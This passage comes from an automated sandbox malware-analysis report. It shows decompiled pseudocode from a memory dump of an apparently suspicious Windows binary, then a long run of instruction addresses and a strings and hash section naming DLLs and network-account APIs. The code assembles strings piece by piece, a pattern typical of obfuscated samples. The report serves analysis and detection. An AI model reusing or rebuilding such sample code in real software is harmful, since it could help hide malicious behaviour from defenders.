      						E0040A3C0(0);
      						_push(_v1916);
      						E0040A3C0(0);
      						_push(_v1920);
      						E0040A3C0(0);
      						_push(_v1924);
      						E0040A3C0(0);
      						_push(_v1928);
      						E0040A3C0(0);
      						_push(_v1932);
      						E006BA5A8(1,  &_v1936, _t5355);
      						E0040A494( &_v1908, _t3910, 8, _t5187, _t5188);
      						E0040A9E8( &_v20, _v1908, _v1936);
      						_pop(_t4896);
      						 *[fs:eax] = _t4896;
      						_push(E008625E1);
      						return E00409CBC( &_v148);
      					}
      				}
      				L252:
      				L1:
      				_push(0);
      				_push(0);
      				_t3911 = _t3911 - 1;
      				if(_t3911 != 0) {
      					goto L1;
      				} else {
      					_push(_t3911);
      					_push(__ebx);
      					_push(__esi);
      					_push(__edi);
      					_push(_t5190);
      					_push(0x86f3c3);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t5191;
      					_t1874 =  *0x8a99d4; // 0x0
      					_v80 = _t1874;
      					if(_v80 != 0) {
      						_v80 =  *((intOrPtr*)(_v80 - 4));
      					}
      					if(_v80 != 0x42) {
      						E0040A0C0( &_v20, _v20);
      					} else {
      						if(_v56 <= _v68) {
      							E0040A0C0( &_v16, _v12);
      							E0040A0C0( &_v12, _v20);
      							__eflags = 0;
      							E0040ACEC(_v12, 0, 1,  &_v20);
      							E0040A0C0( &_v16, _v20);
      							E0040A0C0( &_v12, _v20);
      							E0040A0C0( &_v16, _v12);
      						} else {
      							_v64 = _v28 + 0x7a;
      							_v72 = _v40 + 0x79;
      							_v48 = _v76 * _v24;
      							_v44 = _v60 + _v32;
      							E0040A0C0( &_v16, _v12);
      							_t3865 =  &_v412;
      							_t5154 =  *0x8a9e34; // 0x8b091e
      							 *((char*)(_t3865 + 1)) =  *_t5154;
      							 *_t3865 = 1;
      							E0040A324( &_v416,  &_v412);
      							_t3868 =  &_v420;
      							_t5157 =  *0x8a9f40; // 0x8b0925
      							 *((char*)(_t3868 + 1)) =  *_t5157;
      							 *_t3868 = 1;
      							E0040A34C( &_v416, 2,  &_v420);
      							E0040A324( &_v424,  &_v416);
      							_t3873 =  &_v420;
      							_t5161 =  *0x8aa15c; // 0x8b091c
      							 *((char*)(_t3873 + 1)) =  *_t5161;
      							 *_t3873 = 1;
      							E0040A34C( &_v424, 3,  &_v420);
      							E0040A324( &_v432,  &_v424);
      							_t3878 =  &_v420;
      							_t5165 =  *0x8a9ce4; // 0x8b0912
      							 *((char*)(_t3878 + 1)) =  *_t5165;
      							 *_t3878 = 1;
      							E0040A34C( &_v432, 4,  &_v420);
      							E0040A324( &_v440,  &_v432);
      							_t3883 =  &_v420;
      							_t5169 =  *0x8a9e00; // 0x8b091d
      							 *((char*)(_t3883 + 1)) =  *_t5169;
      							 *_t3883 = 1;
      							E0040A34C( &_v440, 5,  &_v420);
      							E0040A324( &_v448,  &_v440);
      							E0040A34C( &_v448, 6, 0x86f3d4);
      							E0040A324( &_v456,  &_v448);
      							_t3892 =  &_v420;
      							_t5175 =  *0x8aa15c; // 0x8b091c
      							 *((char*)(_t3892 + 1)) =  *_t5175;
      							 *_t3892 = 1;
      							E0040A34C( &_v456, 7,  &_v420);
      							E0040A324( &_v468,  &_v456);
      							_t3897 =  &_v420;
      							_t5179 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3897 + 1)) =  *_t5179;
      							 *_t3897 = 1;
      							E0040A34C( &_v468, 8,  &_v420);
      							E0040A324( &_v480,  &_v468);
      							_t3902 =  &_v420;
      							_t5183 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3902 + 1)) =  *_t5183;
      							 *_t3902 = 1;
      							E0040A34C( &_v480, 9,  &_v420);
      							E0040AA98( &_v480);
      						}
      						E0040A0C0( &_v12, _v16);
      					}
      					E0040A0C0( &_v20, _v20);
      					E0040A0C0( &_v12, _v16);
      					if(_v28 - _v48 != _v60) {
      						E0040A0C0( &_v16, _v16);
      					} else {
      						if(_v76 + _v76 >= _v32 + _v76) {
      							E0040A0C0( &_v20, L"api-ms-win-crt-process-l1-1-0.dll");
      							E0040A0C0( &_v12, _v12);
      							E0040A0C0( &_v12, _v16);
      							E0040ACEC(_v20, 2, 1,  &_v20);
      							E0040A0C0( &_v12, _v16);
      							E0040ACEC(_v20, 2, 1,  &_v16);
      						} else {
      							E0040A0C0( &_v12, _v20);
      							E0040ACEC(_v12, 0, 1,  &_v16);
      							_t3776 =  &_v412;
      							_t5097 =  *0x8a9ce4; // 0x8b0912
      							 *((char*)(_t3776 + 1)) =  *_t5097;
      							 *_t3776 = 1;
      							E0040A324( &_v416,  &_v412);
      							_t3779 =  &_v420;
      							_t5100 =  *0x8aa02c; // 0x8b0926
      							 *((char*)(_t3779 + 1)) =  *_t5100;
      							 *_t3779 = 1;
      							E0040A34C( &_v416, 2,  &_v420);
      							E0040A324( &_v424,  &_v416);
      							_t3784 =  &_v420;
      							_t5104 =  *0x8a9ce4; // 0x8b0912
      							 *((char*)(_t3784 + 1)) =  *_t5104;
      							 *_t3784 = 1;
      							E0040A34C( &_v424, 3,  &_v420);
      							E0040A324( &_v432,  &_v424);
      							_t3789 =  &_v420;
      							_t5108 =  *0x8aa0b8; // 0x8b0928
      							 *((char*)(_t3789 + 1)) =  *_t5108;
      							 *_t3789 = 1;
      							E0040A34C( &_v432, 4,  &_v420);
      							E0040A324( &_v440,  &_v432);
      							_t3794 =  &_v420;
      							_t5112 =  *0x8a9f34; // 0x8b0914
      							 *((char*)(_t3794 + 1)) =  *_t5112;
      							 *_t3794 = 1;
      							E0040A34C( &_v440, 5,  &_v420);
      							E0040A324( &_v448,  &_v440);
      							_t3799 =  &_v420;
      							_t5116 =  *0x8a9f40; // 0x8b0925
      							 *((char*)(_t3799 + 1)) =  *_t5116;
      							 *_t3799 = 1;
      							E0040A34C( &_v448, 6,  &_v420);
      							E0040A324( &_v456,  &_v448);
      							_t3804 =  &_v420;
      							_t5120 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3804 + 1)) =  *_t5120;
      							 *_t3804 = 1;
      							E0040A34C( &_v456, 7,  &_v420);
      							E0040A324( &_v468,  &_v456);
      							_t3809 =  &_v420;
      							_t5124 =  *0x8aa288; // 0x8b091b
      							 *((char*)(_t3809 + 1)) =  *_t5124;
      							 *_t3809 = 1;
      							E0040A34C( &_v468, 8,  &_v420);
      							E0040A324( &_v480,  &_v468);
      							E0040A34C( &_v480, 9, 0x86f3d4);
      							E0040A324( &_v492,  &_v480);
      							_t3818 =  &_v420;
      							_t5130 =  *0x8aa15c; // 0x8b091c
      							 *((char*)(_t3818 + 1)) =  *_t5130;
      							 *_t3818 = 1;
      							E0040A34C( &_v492, 0xa,  &_v420);
      							E0040A324( &_v504,  &_v492);
      							_t3823 =  &_v420;
      							_t5134 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3823 + 1)) =  *_t5134;
      							 *_t3823 = 1;
      							E0040A34C( &_v504, 0xb,  &_v420);
      							E0040A324( &_v520,  &_v504);
      							_t3828 =  &_v420;
      							_t5138 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3828 + 1)) =  *_t5138;
      							 *_t3828 = 1;
      							E0040A34C( &_v520, 0xc,  &_v420);
      							E0040AA98( &_v520);
      							E0040A0C0( &_v12, _v20);
      							E0040A0C0( &_v12, L"wmpshell.dll");
      							E0040A0C0( &_v16, L"NetLocalGroupGetInfo");
      						}
      					}
      					E0040A0C0( &_v20, _v16);
      					if(_v76 - _v60 < 0xd0) {
      						E0040A0C0( &_v20, L"FXSCOM.dll");
      					}
      				}
      				goto L17;
      			}

      0x008604b2
      0x008604b2
      0x008604c4
      0x008604c9
      0x008604e2
      0x008604e7
      0x00860500
      0x00860505
      0x0086051e
      0x00860523
      0x0086053c
      0x00860541
      0x00860555
      0x0086055a
      0x00860573
      0x00860578
      0x00860591
      0x00860596
      0x008605af
      0x008605b4
      0x008605cd
      0x008605d2
      0x008605eb
      0x008605f0
      0x00860604
      0x00860609
      0x00860622
      0x00860627
      0x00860640
      0x00860645
      0x0086065e
      0x00860663
      0x00860674
      0x0086068e
      0x00860699
      0x008606a2
      0x008606a7
      0x008606ac
      0x008606b3
      0x008606bd
      0x008606bd
      0x008606c7
      0x008606d8
      0x008606e2
      0x008606e5
      0x008606ed
      0x008606fe
      0x0086070b
      0x00860714
      0x00860727
      0x00860727
      0x00860732
      0x00860735
      0x00860dbc
      0x00860dc6
      0x00860dcb
      0x00860dd1
      0x00860dd9
      0x00860ddc
      0x00860deb
      0x00860df0
      0x00860df6
      0x00860dfe
      0x00860e01
      0x00860e12
      0x00860e23
      0x00860e28
      0x00860e2e
      0x00860e36
      0x00860e39
      0x00860e4a
      0x00860e5b
      0x00860e60
      0x00860e66
      0x00860e6e
      0x00860e71
      0x00860e82
      0x00860e93
      0x00860e98
      0x00860e9e
      0x00860ea6
      0x00860ea9
      0x00860eba
      0x00860ecb
      0x00860ed0
      0x00860ed6
      0x00860ede
      0x00860ee1
      0x00860ef2
      0x00860f03
      0x00860f08
      0x00860f0e
      0x00860f16
      0x00860f19
      0x00860f2a
      0x00860f3b
      0x00860f40
      0x00860f46
      0x00860f4e
      0x00860f51
      0x00860f62
      0x00860f73
      0x00860f85
      0x00860f96
      0x00860f9b
      0x00860fa1
      0x00860fa9
      0x00860fac
      0x00860fbd
      0x00860fce
      0x00860fd3
      0x00860fd9
      0x00860fe1
      0x00860fe4
      0x00860ff5
      0x00861006
      0x0086100b
      0x00861011
      0x00861019
      0x0086101c
      0x0086102d
      0x0086103b
      0x00861046
      0x00861053
      0x0086105e
      0x00861069
      0x0086073b
      0x00860741
      0x0086074e
      0x00860759
      0x00860764
      0x00860769
      0x0086076f
      0x00860777
      0x0086077a
      0x00860789
      0x0086078e
      0x00860794
      0x0086079c
      0x0086079f
      0x008607b0
      0x008607c1
      0x008607c6
      0x008607cc
      0x008607d4
      0x008607d7
      0x008607e8
      0x008607f9
      0x0086080b
      0x0086081c
      0x00860821
      0x00860827
      0x0086082f
      0x00860832
      0x00860843
      0x00860854
      0x00860859
      0x0086085f
      0x00860867
      0x0086086a
      0x0086087b
      0x0086088c
      0x0086089e
      0x008608af
      0x008608b4
      0x008608ba
      0x008608c2
      0x008608c5
      0x008608d6
      0x008608e7
      0x008608ec
      0x008608f2
      0x008608fa
      0x008608fd
      0x0086090e
      0x0086091f
      0x00860924
      0x0086092a
      0x00860932
      0x00860935
      0x00860946
      0x00860957
      0x00860969
      0x0086097a
      0x0086097f
      0x00860985
      0x0086098d
      0x00860990
      0x008609a1
      0x008609b2
      0x008609b7
      0x008609bd
      0x008609c5
      0x008609c8
      0x008609d9
      0x008609ea
      0x008609ef
      0x008609f5
      0x008609fd
      0x00860a00
      0x00860a11
      0x00860a22
      0x00860a27
      0x00860a2d
      0x00860a35
      0x00860a38
      0x00860a49
      0x00860a5a
      0x00860a6c
      0x00860a7d
      0x00860a82
      0x00860a88
      0x00860a90
      0x00860a93
      0x00860aa4
      0x00860ab5
      0x00860aba
      0x00860ac0
      0x00860ac8
      0x00860acb
      0x00860adc
      0x00860aed
      0x00860af2
      0x00860af8
      0x00860b00
      0x00860b03
      0x00860b14
      0x00860b25
      0x00860b2a
      0x00860b30
      0x00860b38
      0x00860b3b
      0x00860b4c
      0x00860b5d
      0x00860b62
      0x00860b68
      0x00860b70
      0x00860b73
      0x00860b84
      0x00860b95
      0x00860b9a
      0x00860ba0
      0x00860ba8
      0x00860bab
      0x00860bbc
      0x00860bcd
      0x00860bd2
      0x00860bd8
      0x00860be0
      0x00860be3
      0x00860bf4
      0x00860c05
      0x00860c0a
      0x00860c10
      0x00860c18
      0x00860c1b
      0x00860c2c
      0x00860c3d
      0x00860c42
      0x00860c48
      0x00860c50
      0x00860c53
      0x00860c64
      0x00860c75
      0x00860c87
      0x00860c98
      0x00860c9d
      0x00860ca3
      0x00860cab
      0x00860cae
      0x00860cbf
      0x00860cd5
      0x00860cda
      0x00860ceb
      0x00860cf0
      0x00860cf6
      0x00860d06
      0x00860d0b
      0x00860d11
      0x00860d1e
      0x00860d23
      0x00860d29
      0x00860d41
      0x00860d46
      0x00860d5f
      0x00860d64
      0x00860d7d
      0x00860d93
      0x00860da1
      0x00860dae
      0x00860dae
      0x00860735
      0x00861074
      0x0086107f
      0x0086108a
      0x008610aa
      0x0086108c
      0x0086109d
      0x0086109d
      0x008610af
      0x008610b6
      0x008610c0
      0x008610c2
      0x008610c2
      0x008610c6
      0x008610cd
      0x008610d7
      0x008610d9
      0x008610d9
      0x008610dd
      0x008610e4
      0x008610ee
      0x008610f0
      0x008610f0
      0x00861102
      0x00861107
      0x00861120
      0x00861125
      0x0086113e
      0x00861143
      0x0086115c
      0x00861161
      0x0086117a
      0x0086117f
      0x00861193
      0x00861198
      0x008611b1
      0x008611b6
      0x008611cf
      0x008611d4
      0x008611ed
      0x008611f2
      0x00861206
      0x0086120b
      0x00861224
      0x00861229
      0x00861242
      0x00861247
      0x00861260
      0x00861265
      0x00861276
      0x00861290
      0x00861297
      0x0086129e
      0x008612a4
      0x008612ad
      0x008612b3
      0x008612be
      0x008612c3
      0x008612c8
      0x008612cf
      0x008612d6
      0x008612d8
      0x008612db
      0x008612e3
      0x008612e6
      0x008612ee
      0x008612f1
      0x008612fc
      0x00861301
      0x0086130c
      0x00861311
      0x00861316
      0x0086131b
      0x00861326
      0x00861326
      0x00861340
      0x00861342
      0x0086134c
      0x00861351
      0x0086135c
      0x00861361
      0x0086136c
      0x00861371
      0x00861376
      0x0086137b
      0x00861380
      0x00861385
      0x00861390
      0x00861390
      0x00861395
      0x008613aa
      0x008613af
      0x008613b4
      0x008613bb
      0x008613c0
      0x008613c5
      0x008613ca
      0x008613d1
      0x008613db
      0x008613db
      0x008613e2
      0x008613f3
      0x008613fe
      0x0086140a
      0x0086140c
      0x0086140e
      0x00861419
      0x0086141e
      0x00861429
      0x0086142e
      0x00861439
      0x0086143e
      0x00861443
      0x00861448
      0x00861450
      0x00861455
      0x0086145a
      0x0086145a
      0x0086145d
      0x0086145d
      0x008613e4
      0x008613e4
      0x008613ec
      0x008613ec
      0x00861462
      0x0086146a
      0x0086146f
      0x00861476
      0x00861480
      0x00861482
      0x00861482
      0x00861486
      0x0086148d
      0x00861497
      0x00861499
      0x00861499
      0x0086149d
      0x008614a4
      0x008614ae
      0x008614b0
      0x008614b0
      0x008614b4
      0x008614bb
      0x008614c5
      0x008614c7
      0x008614c7
      0x008614d9
      0x008614de
      0x008614f7
      0x008614fc
      0x00861515
      0x0086151a
      0x00861533
      0x00861538
      0x00861551
      0x00861556
      0x0086156a
      0x0086156f
      0x00861588
      0x0086158d
      0x008615a6
      0x008615ab
      0x008615bf
      0x008615c4
      0x008615dd
      0x008615e2
      0x008615fb
      0x00861600
      0x00861619
      0x0086161e
      0x00861632
      0x00861637
      0x00861650
      0x00861655
      0x0086166e
      0x00861673
      0x0086168c
      0x00861691
      0x008616aa
      0x008616af
      0x008616c0
      0x008616da
      0x008616e1
      0x008616e8
      0x008616ea
      0x008616ed
      0x008616f2
      0x008616fd
      0x008616fd
      0x00861708
      0x0086170d
      0x00861713
      0x00861722
      0x00861782
      0x0086178d
      0x0086179d
      0x008617a2
      0x008617ad
      0x008617b2
      0x008617bd
      0x008617c2
      0x008617c7
      0x008617cc
      0x008617d1
      0x008617d1
      0x008617d4
      0x00861724
      0x0086172c
      0x00861735
      0x0086173b
      0x00861746
      0x00861750
      0x00861753
      0x0086175b
      0x00861760
      0x0086176b
      0x00861770
      0x0086177b
      0x0086177b
      0x008617d9
      0x008617de
      0x008617e3
      0x008617e8
      0x008617ed
      0x008617f7
      0x008617fc
      0x00861801
      0x00861807
      0x00861809
      0x00861811
      0x00861816
      0x0086181e
      0x00861823
      0x0086182e
      0x00861833
      0x0086183f
      0x00861844
      0x0086184f
      0x00861854
      0x0086185c
      0x0086185c
      0x00861867
      0x00861867
      0x0086186c
      0x00861871
      0x0086187f
      0x00861893
      0x00861898
      0x00861898
      0x0086189e
      0x00861881
      0x00861881
      0x0086188c
      0x0086188c
      0x008618a3
      0x008618ab
      0x008618b1
      0x008618bc
      0x008618c7
      0x008618cc
      0x008618d3
      0x008618dd
      0x008618df
      0x008618df
      0x008618e3
      0x008618ea
      0x008618f4
      0x008618f6
      0x008618f6
      0x008618fa
      0x00861901
      0x0086190b
      0x0086190d
      0x0086190d
      0x0086191f
      0x00861924
      0x0086193d
      0x00861942
      0x0086195b
      0x00861960
      0x00861979
      0x0086197e
      0x00861997
      0x0086199c
      0x008619b0
      0x008619b5
      0x008619ce
      0x008619d3
      0x008619ec
      0x008619f1
      0x00861a0a
      0x00861a0f
      0x00861a28
      0x00861a2d
      0x00861a46
      0x00861a4b
      0x00861a5f
      0x00861a64
      0x00861a7d
      0x00861a82
      0x00861a9b
      0x00861aa0
      0x00861ab1
      0x00861acb
      0x00861ad2
      0x00861ad5
      0x00861ada
      0x00861adf
      0x00861ae6
      0x00861aed
      0x00861aef
      0x00861af4
      0x00861afb
      0x00861afd
      0x00861b06
      0x00861b0f
      0x00861b1a
      0x00861b1d
      0x00861b28
      0x00861b2d
      0x00861b37
      0x00861b46
      0x00861b4b
      0x00861b51
      0x00861b68
      0x00861b6f
      0x00861b74
      0x00861b84
      0x00861b89
      0x00861b90
      0x00861b9a
      0x00861b9c
      0x00861b9c
      0x00861ba0
      0x00861ba7
      0x00861bb1
      0x00861bb3
      0x00861bb3
      0x00861bb7
      0x00861bbe
      0x00861bc8
      0x00861bca
      0x00861bca
      0x00861bdc
      0x00861be1
      0x00861bfa
      0x00861bff
      0x00861c18
      0x00861c1d
      0x00861c36
      0x00861c3b
      0x00861c54
      0x00861c59
      0x00861c6d
      0x00861c72
      0x00861c8b
      0x00861c90
      0x00861ca9
      0x00861cae
      0x00861cc7
      0x00861ccc
      0x00861ce5
      0x00861cea
      0x00861d03
      0x00861d08
      0x00861d21
      0x00861d26
      0x00861d3a
      0x00861d3f
      0x00861d58
      0x00861d5d
      0x00861d76
      0x00861d7b
      0x00861d94
      0x00861d99
      0x00861daa
      0x00861dc4
      0x00861dc9
      0x00861dd0
      0x00861dda
      0x00861ddc
      0x00861ddc
      0x00861de0
      0x00861de7
      0x00861df1
      0x00861df3
      0x00861df3
      0x00861df7
      0x00861dfe
      0x00861e0e
      0x00861e10
      0x00861e10
      0x00861e17
      0x00861e1e
      0x00861e2e
      0x00861e30
      0x00861e30
      0x00861e37
      0x00861e3e
      0x00861e4e
      0x00861e50
      0x00861e50
      0x00861e65
      0x00861e6a
      0x00861e83
      0x00861e88
      0x00861ea1
      0x00861ea6
      0x00861eba
      0x00861ebf
      0x00861ed8
      0x00861edd
      0x00861ef6
      0x00861efb
      0x00861f14
      0x00861f19
      0x00861f32
      0x00861f37
      0x00861f50
      0x00861f55
      0x00861f6e
      0x00861f73
      0x00861f8a
      0x00861f8f
      0x00861fa8
      0x00861fad
      0x00861fc4
      0x00861fc9
      0x00861fe2
      0x00861fe7
      0x00862000
      0x00862005
      0x0086201e
      0x00862023
      0x0086203c
      0x00862041
      0x0086205a
      0x0086205f
      0x00862078
      0x0086207d
      0x00862094
      0x00862099
      0x008620aa
      0x008620c4
      0x008620cf
      0x008620d4
      0x008620db
      0x008625eb
      0x008625eb
      0x008625f2
      0x00862600
      0x00862602
      0x00862604
      0x00862604
      0x00862604
      0x00862604
      0x0086260b
      0x00862612
      0x00862620
      0x00862622
      0x00862624
      0x00862624
      0x00862624
      0x00862624
      0x0086262b
      0x00862632
      0x00862640
      0x00862642
      0x00862644
      0x00862644
      0x00862644
      0x00862644
      0x0086264b
      0x00862652
      0x00862660
      0x00862662
      0x00862664
      0x00862664
      0x00862664
      0x00862664
      0x0086266b
      0x00862672
      0x00862680
      0x00862682
      0x00862684
      0x00862684
      0x00862684
      0x00862684
      0x0086268b
      0x00862692
      0x008626a0
      0x008626a2
      0x008626a4
      0x008626a4
      0x008626a4
      0x008626a4
      0x008626bc
      0x008626c1
      0x008626da
      0x008626df
      0x008626f8
      0x008626fd
      0x00862714
      0x00862719
      0x00862732
      0x00862737
      0x00862750
      0x00862755
      0x0086276e
      0x00862773
      0x0086278a
      0x0086278f
      0x008627a8
      0x008627ad
      0x008627c6
      0x008627cb
      0x008627e4
      0x008627e9
      0x00862802
      0x00862807
      0x00862820
      0x00862825
      0x0086283e
      0x00862843
      0x0086285c
      0x00862861
      0x0086287a
      0x0086287f
      0x00862896
      0x0086289b
      0x008628b2
      0x008628b7
      0x008628ce
      0x008628d3
      0x008628ec
      0x008628f1
      0x0086290a
      0x0086290f
      0x00862928
      0x0086292d
      0x00862946
      0x0086294b
      0x00862964
      0x00862969
      0x00862982
      0x00862987
      0x008629a0
      0x008629a5
      0x008629be
      0x008629d4
      0x008629e2
      0x008629ed
      0x008629f8
      0x008629ff
      0x00862a00
      0x00862a05
      0x00862a08
      0x00862a0b
      0x00862a12
      0x00862a20
      0x00862a22
      0x00862a24
      0x00862a24
      0x00862a24
      0x00862a24
      0x00862a2b
      0x00862a32
      0x00862a40
      0x00862a42
      0x00862a44
      0x00862a44
      0x00862a44
      0x00862a44
      0x00862a4b
      0x00862a52
      0x00862a60
      0x00862a62
      0x00862a64
      0x00862a64
      0x00862a64
      0x00862a64
      0x00862a6b
      0x00862a72
      0x00862a80
      0x00862a82
      0x00862a84
      0x00862a84
      0x00862a84
      0x00862a84
      0x00862a8b
      0x00862a92
      0x00862aa0
      0x00862aa2
      0x00862aa4
      0x00862aa4
      0x00862aa4
      0x00862aa4
      0x00862aab
      0x00862ab2
      0x00862ac0
      0x00862ac2
      0x00862ac4
      0x00862ac4
      0x00862ac4
      0x00862ac4
      0x00862adc
      0x00862ae1
      0x00862af8
      0x00862afd
      0x00862b14
      0x00862b19
      0x00862b30
      0x00862b35
      0x00862b4c
      0x00862b51
      0x00862b68
      0x00862b6d
      0x00862b7e
      0x00862b83
      0x00862b94
      0x00862b99
      0x00862ba0
      0x00862bae
      0x00862bb0
      0x00862bb2
      0x00862bb2
      0x00862bb2
      0x00862bb2
      0x00862bb9
      0x00862bc0
      0x00862bce
      0x00862bd0
      0x00862bd2
      0x00862bd2
      0x00862bd2
      0x00862bd2
      0x00862bd9
      0x00862be0
      0x00862bee
      0x00862bf0
      0x00862bf2
      0x00862bf2
      0x00862bf2
      0x00862bf2
      0x00862bf9
      0x00862c00
      0x00862c0e
      0x00862c10
      0x00862c12
      0x00862c12
      0x00862c12
      0x00862c12
      0x00862c19
      0x00862c30
      0x00862c35
      0x00862c3b
      0x00862c51
      0x00862c56
      0x00862c6d
      0x00862c72
      0x00862c89
      0x00862c9f
      0x00862cad
      0x00862cb2
      0x00862cb4
      0x00862cb7
      0x00862cba
      0x00862cca
      0x008620e1
      0x008620e1
      0x008620e1
      0x008620ed
      0x00000000
      0x00000000
      0x008625e1
      0x008625e5
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x008625e5
      0x008620f9
      0x00862102
      0x0086210b
      0x00862110
      0x00862117
      0x00862127
      0x00862129
      0x00862129
      0x00862130
      0x00862137
      0x00862147
      0x00862149
      0x00862149
      0x00862150
      0x00862157
      0x00862167
      0x00862169
      0x00862169
      0x00862181
      0x00862186
      0x0086219f
      0x008621a4
      0x008621bd
      0x008621c2
      0x008621d9
      0x008621de
      0x008621f7
      0x008621fc
      0x00862215
      0x0086221a
      0x00862233
      0x00862238
      0x00862251
      0x00862256
      0x0086226f
      0x00862274
      0x0086228d
      0x00862292
      0x008622ab
      0x008622b0
      0x008622c9
      0x008622ce
      0x008622e5
      0x008622ea
      0x00862303
      0x00862308
      0x00862321
      0x00862337
      0x00862345
      0x00862350
      0x00862357
      0x00862358
      0x0086235d
      0x00862360
      0x00862363
      0x0086236a
      0x0086237a
      0x0086237c
      0x0086237c
      0x00862383
      0x0086238a
      0x0086239a
      0x0086239c
      0x0086239c
      0x008623a3
      0x008623aa
      0x008623ba
      0x008623bc
      0x008623bc
      0x008623bc
      0x008623bc
      0x008623d4
      0x008623d9
      0x008623f2
      0x008623f7
      0x00862410
      0x00862415
      0x0086242c
      0x00862431
      0x00862448
      0x0086244d
      0x0086245e
      0x00862463
      0x00862474
      0x00862479
      0x00862480
      0x00862490
      0x00862492
      0x00862492
      0x00862499
      0x008624a0
      0x008624b0
      0x008624b2
      0x008624b2
      0x008624b9
      0x008624c0
      0x008624d0
      0x008624d2
      0x008624d2
      0x008624d2
      0x008624d2
      0x008624d9
      0x008624f0
      0x008624f5
      0x0086250e
      0x00862513
      0x0086252c
      0x00862531
      0x0086254a
      0x0086254f
      0x00862566
      0x0086256b
      0x00862582
      0x00862587
      0x00862598
      0x008625ae
      0x008625bc
      0x008625c3
      0x008625c6
      0x008625c9
      0x008625d9
      0x008625d9
      0x008620db
      0x00000000
      0x0085e768
      0x0085e768
      0x0085e76a
      0x0085e76c
      0x0085e76d
      0x00000000
      0x0085e76f
      0x0085e76f
      0x0085e770
      0x0085e771
      0x0085e772
      0x0085e775
      0x0085e776
      0x0085e77b
      0x0085e77e
      0x0085e781
      0x0085e786
      0x0085e78d
      0x0085e797
      0x0085e797
      0x0085e79e
      0x0085ea0b
      0x0085e7a4
      0x0085e7aa
      0x0085e9b4
      0x0085e9bf
      0x0085e9c8
      0x0085e9d2
      0x0085e9dd
      0x0085e9e8
      0x0085e9f3
      0x0085e7b0
      0x0085e7b6
      0x0085e7bf
      0x0085e7c8
      0x0085e7d1
      0x0085e7da
      0x0085e7df
      0x0085e7e5
      0x0085e7ed
      0x0085e7f0
      0x0085e7ff
      0x0085e804
      0x0085e80a
      0x0085e812
      0x0085e815
      0x0085e826
      0x0085e837
      0x0085e83c
      0x0085e842
      0x0085e84a
      0x0085e84d
      0x0085e85e
      0x0085e86f
      0x0085e874
      0x0085e87a
      0x0085e882
      0x0085e885
      0x0085e896
      0x0085e8a7
      0x0085e8ac
      0x0085e8b2
      0x0085e8ba
      0x0085e8bd
      0x0085e8ce
      0x0085e8df
      0x0085e8f1
      0x0085e902
      0x0085e907
      0x0085e90d
      0x0085e915
      0x0085e918
      0x0085e929
      0x0085e93a
      0x0085e93f
      0x0085e945
      0x0085e94d
      0x0085e950
      0x0085e961
      0x0085e972
      0x0085e977
      0x0085e97d
      0x0085e985
      0x0085e988
      0x0085e999
      0x0085e9a7
      0x0085e9a7
      0x0085e9fe
      0x0085e9fe
      0x0085ea16
      0x0085ea21
      0x0085ea2f
      0x0085ed65
      0x0085ea35
      0x0085ea43
      0x0085ed0b
      0x0085ed16
      0x0085ed21
      0x0085ed37
      0x0085ed42
      0x0085ed58
      0x0085ea49
      0x0085ea4f
      0x0085ea62
      0x0085ea67
      0x0085ea6d
      0x0085ea75
      0x0085ea78
      0x0085ea87
      0x0085ea8c
      0x0085ea92
      0x0085ea9a
      0x0085ea9d
      0x0085eaae
      0x0085eabf
      0x0085eac4
      0x0085eaca
      0x0085ead2
      0x0085ead5
      0x0085eae6
      0x0085eaf7
      0x0085eafc
      0x0085eb02
      0x0085eb0a
      0x0085eb0d
      0x0085eb1e
      0x0085eb2f
      0x0085eb34
      0x0085eb3a
      0x0085eb42
      0x0085eb45
      0x0085eb56
      0x0085eb67
      0x0085eb6c
      0x0085eb72
      0x0085eb7a
      0x0085eb7d
      0x0085eb8e
      0x0085eb9f
      0x0085eba4
      0x0085ebaa
      0x0085ebb2
      0x0085ebb5
      0x0085ebc6
      0x0085ebd7
      0x0085ebdc
      0x0085ebe2
      0x0085ebea
      0x0085ebed
      0x0085ebfe
      0x0085ec0f
      0x0085ec21
      0x0085ec32
      0x0085ec37
      0x0085ec3d
      0x0085ec45
      0x0085ec48
      0x0085ec59
      0x0085ec6a
      0x0085ec6f
      0x0085ec75
      0x0085ec7d
      0x0085ec80
      0x0085ec91
      0x0085eca2
      0x0085eca7
      0x0085ecad
      0x0085ecb5
      0x0085ecb8
      0x0085ecc9
      0x0085ecd7
      0x0085ece2
      0x0085ecef
      0x0085ecfc
      0x0085ecfc
      0x0085ea43
      0x0085ed70
      0x0085ed80
      0x0085ed8a
      0x0085ed8a
      0x0085ed80
      0x00000000

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $,y`~$EP0NS411.DLL$FXSCOM.dll$IMEPADSM.DLL$NetLocalGroupGetInfo$NetSessionDel$NlsLexicons001a.dll$api-ms-win-crt-process-l1-1-0.dll$f3ahvoas.dll$mscat32.dll$secur32.dll$systemcpl.dll$wmpshell.dll$wow32.dll
      • API String ID: 0-3408819571
      • Opcode ID: eb116362f46ec99cb0b42e9def089c68c2e2ee596d9b925e802fe5509ede81fc
      • Instruction ID: 0f1591226680140fbd15c03a1ba7c1fbb519c8ba427debd44d09a04df11d47ff
      • Opcode Fuzzy Hash: eb116362f46ec99cb0b42e9def089c68c2e2ee596d9b925e802fe5509ede81fc
      • Instruction Fuzzy Hash: D7A38D3490929A8FDB11DF64D890BDCBBB2FF4A308F0050E6D488A7762D7356A99CF15
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
